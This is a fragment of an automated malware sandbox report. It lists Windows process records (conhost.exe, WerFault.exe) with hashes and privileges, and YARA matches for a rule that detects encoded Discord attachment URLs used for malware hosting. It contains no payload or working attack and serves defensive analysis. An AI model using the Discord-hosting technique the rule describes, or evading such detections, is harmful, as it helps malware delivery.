                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253255248.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        General

                                                                                                                                                                        Start time:04:56:03
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        General

                                                                                                                                                                        Start time:04:56:09
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
                                                                                                                                                                        Imagebase:0x7ff64e5e0000
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >